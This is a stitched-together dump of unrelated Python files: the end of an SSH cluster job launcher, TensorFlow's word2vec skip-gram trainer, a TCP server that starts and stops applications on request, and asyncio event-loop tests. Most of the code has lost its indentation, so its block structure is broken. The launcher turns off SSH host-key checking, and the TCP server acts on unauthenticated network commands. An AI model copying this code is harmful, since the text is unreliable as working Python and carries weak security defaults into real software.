pool.apply_async(sync_dir, args=(local_dir, h, working_dir))
pool.close()
pool.join()
# launch jobs
for i in range(nworker + nserver):
pass_envs['DMLC_ROLE'] = 'server' if i < nserver else 'worker'
(node, port) = hosts[i % len(hosts)]
logging.debug("SSH-ing to %s:%s", node, port)
pass_envs['DMLC_NODE_HOST'] = node
prog = get_env(pass_envs) + ' cd ' + working_dir + '; ' + (' '.join(args.command))
prog = 'ssh -o StrictHostKeyChecking=no ' + node + ' -p ' + port + ' \'' + prog + '\''
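            # The composed command has the shape (host, port and program are
            # illustrative; other exports elided):
            #   ssh -o StrictHostKeyChecking=no 10.0.0.2 -p 22 'export DMLC_ROLE=worker; ...; cd /tmp/work; ./train.sh'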
thread = Thread(target = run, args=(prog,))
            thread.daemon = True
thread.start()
return ssh_submit
tracker.submit(args.num_workers, args.num_servers,
fun_submit=ssh_submit,
pscmd=(' '.join(args.command)),
hostIP=args.host_ip)
|
word2vec.py
|
"""Multi-threaded word2vec mini-batched skip-gram model.
Trains the model described in:
(Mikolov et al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does traditional minibatching.
The key ops used are:
* placeholder for feeding in tensors for each example.
* embedding_lookup for fetching rows from the embedding matrix.
* sigmoid_cross_entropy_with_logits to calculate the loss.
* GradientDescentOptimizer for optimizing the loss.
* skipgram custom op that does input processing.
"""
import os
import sys
import threading
import time
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model and "
"training summaries.")
flags.DEFINE_string("train_data", None, "Training text file. "
"E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "File consisting of analogies of four tokens."
"embedding 2 - embedding 1 + embedding 3 should be close "
"to embedding 4."
"E.g. https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.2, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 100,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 16,
"Number of training examples processed per step "
"(size of a minibatch).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy('france', 'paris', 'russia') and "
"model.nearby(['proton', 'elephant', 'maxwell']")
flags.DEFINE_integer("statistics_interval", 5,
"Print statistics every n seconds.")
flags.DEFINE_integer("summary_interval", 5,
"Save training summary to file every n seconds (rounded "
"up to statistics interval.")
flags.DEFINE_integer("checkpoint_interval", 600,
"Checkpoint the model (i.e. save the parameters) every n "
"seconds (rounded up to statistics interval.")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# How often to print statistics.
self.statistics_interval = FLAGS.statistics_interval
# How often to write to the summary file (rounds up to the nearest
# statistics_interval).
self.summary_interval = FLAGS.summary_interval
# How often to write checkpoints (rounds up to the nearest statistics
# interval).
self.checkpoint_interval = FLAGS.checkpoint_interval
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data) as analogy_f:
for line in analogy_f:
if line.startswith(":"): # Skip comments.
continue
words = line.strip().lower().split(" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print "Eval analogy file: ", self._options.eval_data
print "Questions: ", len(questions)
print "Skipped: ", questions_skipped
self._analogy_questions = np.array(questions, dtype=np.int32)
def forward(self, examples, labels):
"""Build the graph for the forward pass."""
opts = self._options
# Declare all variables we need.
# Embedding: [vocab_size, emb_dim]
init_width = 0.5 / opts.emb_dim
emb = tf.Variable(
tf.random_uniform(
[opts.vocab_size, opts.emb_dim], -init_width, init_width),
name="emb")
self._emb = emb
# Softmax weight: [vocab_size, emb_dim]. Transposed.
sm_w_t = tf.Variable(
tf.zeros([opts.vocab_size, opts.emb_dim]),
name="sm_w_t")
# Softmax bias: [emb_dim].
sm_b = tf.Variable(tf.zeros([opts.vocab_size]), name="sm_b")
# Global step: scalar, i.e., shape [].
self.global_step = tf.Variable(0, name="global_step")
# Nodes to compute the nce loss w/ candidate sampling.
labels_matrix = tf.reshape(
tf.cast(labels,
dtype=tf.int64),
[opts.batch_size, 1])
# Negative sampling.
sampled_ids, _, _ = (tf.nn.fixed_unigram_candidate_sampler(
true_classes=labels_matrix,
num_true=1,
num_sampled=opts.num_samples,
unique=True,
range_max=opts.vocab_size,
distortion=0.75,
unigrams=opts.vocab_counts.tolist()))
# Embeddings for examples: [batch_size, emb_dim]
example_emb = tf.nn.embedding_lookup(emb, examples)
# Weights for labels: [batch_size, emb_dim]
true_w = tf.nn.embedding_lookup(sm_w_t, labels)
# Biases for labels: [batch_size, 1]
true_b = tf.nn.embedding_lookup(sm_b, labels)
# Weights for sampled ids: [num_sampled, emb_dim]
sampled_w = tf.nn.embedding_lookup(sm_w_t, sampled_ids)
# Biases for sampled ids: [num_sampled, 1]
sampled_b = tf.nn.embedding_lookup(sm_b, sampled_ids)
# True logits: [batch_size, 1]
true_logits = tf.reduce_sum(tf.mul(example_emb, true_w), 1) + true_b
# Sampled logits: [batch_size, num_sampled]
    # We replicate sampled noise labels for all examples in the batch
# using the matmul.
sampled_b_vec = tf.reshape(sampled_b, [opts.num_samples])
sampled_logits = tf.matmul(example_emb,
sampled_w,
transpose_b=True) + sampled_b_vec
return true_logits, sampled_logits
def nce_loss(self, true_logits, sampled_logits):
"""Build the graph for the NCE loss."""
# cross-entropy(logits, labels)
opts = self._options
true_xent = tf.nn.sigmoid_cross_entropy_with_logits(
true_logits, tf.ones_like(true_logits))
sampled_xent = tf.nn.sigmoid_cross_entropy_with_logits(
sampled_logits, tf.zeros_like(sampled_logits))
# NCE-loss is the sum of the true and noise (sampled words)
# contributions, averaged over the batch.
nce_loss_tensor = (tf.reduce_sum(true_xent) +
tf.reduce_sum(sampled_xent)) / opts.batch_size
return nce_loss_tensor
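  # A minimal NumPy sketch of the same objective (illustrative only, not used
  # by training): sigmoid cross-entropy of the true logits against ones and of
  # the sampled logits against zeros, summed and averaged over the batch.
  def nce_loss_numpy(self, true_logits, sampled_logits):
    """Reference NCE loss on NumPy arrays (assumes numpy float inputs)."""
    def xent(logits, labels):
      # Numerically stable sigmoid cross-entropy with constant 0/1 labels.
      return np.maximum(logits, 0) - logits * labels + np.log1p(np.exp(-np.abs(logits)))
    batch_size = true_logits.shape[0]
    return (np.sum(xent(true_logits, 1.0)) +
            np.sum(xent(sampled_logits, 0.0))) / batch_size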
def optimize(self, loss):
"""Build the graph to optimize the loss function."""
# Optimizer nodes.
# Linear learning rate decay.
opts = self._options
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train)
self._lr = lr
optimizer = tf.train.GradientDescentOptimizer(lr)
train = optimizer.minimize(loss,
global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def build_eval_graph(self):
"""Build the eval graph."""
# Eval graph
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._emb, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, self._options.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
def build_graph(self):
"""Build the graph for the full model."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, self._epoch, self._words, examples,
labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print "Data file: ", opts.train_data
print "Vocab size: ", opts.vocab_size - 1, " + UNK"
print "Words per epoch: ", opts.words_per_epoch
self._examples = examples
self._labels = labels
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
true_logits, sampled_logits = self.forward(examples, labels)
loss = self.nce_loss(true_logits, sampled_logits)
tf.scalar_summary("NCE loss", loss)
self._loss = loss
self.optimize(loss)
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
f.write(opts.vocab_words[i] + " " + str(opts.vocab_counts[i]) + "\n")
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
summary_op = tf.merge_all_summaries()
summary_writer = tf.train.SummaryWriter(opts.save_path,
graph_def=self._session.graph_def)
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time, last_summary_time = initial_words, time.time(), 0
last_checkpoint_time = 0
while True:
      time.sleep(opts.statistics_interval)  # Reports our progress once in a while.
(epoch, step, loss, words, lr) = self._session.run(
[self._epoch, self.global_step, self._loss, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f loss = %6.2f words/sec = %8.0f\r" %
(epoch, step, lr, loss, rate)),
sys.stdout.flush()
if now - last_summary_time > opts.summary_interval:
summary_str = self._session.run(summary_op)
summary_writer.add_summary(summary_str, step)
last_summary_time = now
if now - last_checkpoint_time > opts.checkpoint_interval:
self.saver.save(self._session,
opts.save_path + "model",
global_step=step.astype(int))
last_checkpoint_time = now
if epoch != initial_epoch:
break
for t in workers:
t.join()
return epoch
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print
print "Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total)
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print "\n%s\n=====================================" % (words[i])
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print "%-20s %6.4f" % (self._id2word[neighbor], distance)
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print "--train_data --eval_data and --save_path must be specified."
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy('france', 'paris', 'russia')
# [1]: model.nearby(['proton', 'elephant', 'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
server.py
|
"""Tcp server module."""
import socket
import threading
from taskmanager.tcp_protocol import const_tcp
from taskmanager.tcp_protocol import message_templates as tmp
from taskmanager.process_management import task_manager as tm
class TCPServer:
"""The class that is responsible for creating the server object."""
def __init__(self):
"""Create a socket and connect to a port."""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((const_tcp.TCP_IP, const_tcp.TCP_PORT))
self.sock.listen()
self.manager = tm.Manager()
def message_processing(self, connection, data):
"""Method for processing messages."""
if tmp.START_APP in data:
self.manager.manage_application(
data.replace(tmp.START_APP, ''))
elif tmp.STOP_APP in data:
self.manager.manage_application(
data.replace(tmp.STOP_APP, ''), close=True)
elif tmp.SEND_MSG in data:
self.manager.sending_messages(
data.replace(tmp.SEND_MSG, ''))
elif tmp.UPD_RPOCESS in data:
connection.send(
self.manager.get_list_of_applications().encode('UTF-8'))
def client_listening(self):
"""Waiting for messages from the client."""
while True:
connection, address = self.sock.accept()
data = connection.recv(const_tcp.BUFFER_SIZE)
self.message_processing(connection, data.decode('UTF-8'))
def start(self):
"""Start a separate thread for server operation."""
server_thread = threading.Thread(target=self.client_listening)
server_thread.start()
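# Illustrative client-side sketch (assumes the same const_tcp and
# message_templates values that the server imports; the application name is a
# placeholder):
#
#   import socket
#   from taskmanager.tcp_protocol import const_tcp
#   from taskmanager.tcp_protocol import message_templates as tmp
#
#   with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
#       client.connect((const_tcp.TCP_IP, const_tcp.TCP_PORT))
#       client.send((tmp.START_APP + 'someapp').encode('UTF-8'))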
|
test_events.py
|
"""Tests for events.py."""
#TODO: port the Handle and Policy tests
import functools
import gc
import io
import os
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
HAS_SNI = False
else:
from ssl import HAS_SNI
import subprocess
import sys
import threading
import time
import errno
import unittest
import unittest.mock
import testsupport # find_unused_port, IPV6_ENABLED, TEST_HOME_DIR
import asyncio
from asyncio import events
from asyncio import selector_events
from asyncio import test_utils
import gpotato
from gi.repository import GLib
from gi.repository import GObject
def data_file(filename):
if hasattr(testsupport, 'TEST_HOME_DIR'):
fullname = os.path.join(testsupport.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
class MyProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class LoopSetupMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
asyncio.set_event_loop(None)
def tearDown(self):
        # just in case we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
def create_event_loop(self):
# Just a default, for test sets that don't care
return gpotato.GLibEventLoop(GLib.main_context_default())
class EventLoopTestsMixin(LoopSetupMixin):
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
bytes_read = []
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.append(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_briefly(self.loop)
self.loop.call_soon(w.send, b'def')
test_utils.run_briefly(self.loop)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(b''.join(bytes_read), b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
self.loop.add_writer(w.fileno(), w.send, b'x'*(256*1024))
test_utils.run_briefly(self.loop)
def remove_writer():
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.loop.call_soon(remove_writer)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
w.close()
data = r.recv(256*1024)
r.close()
self.assertGreaterEqual(len(data), 200)
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
test_utils.run_briefly(self.loop)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_briefly(self.loop)
self.assertEqual(caught, 1)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
# SIGALRM not supported by GLib
@unittest.skipUnless(0 and hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(0 and hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
@unittest.expectedFailure
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
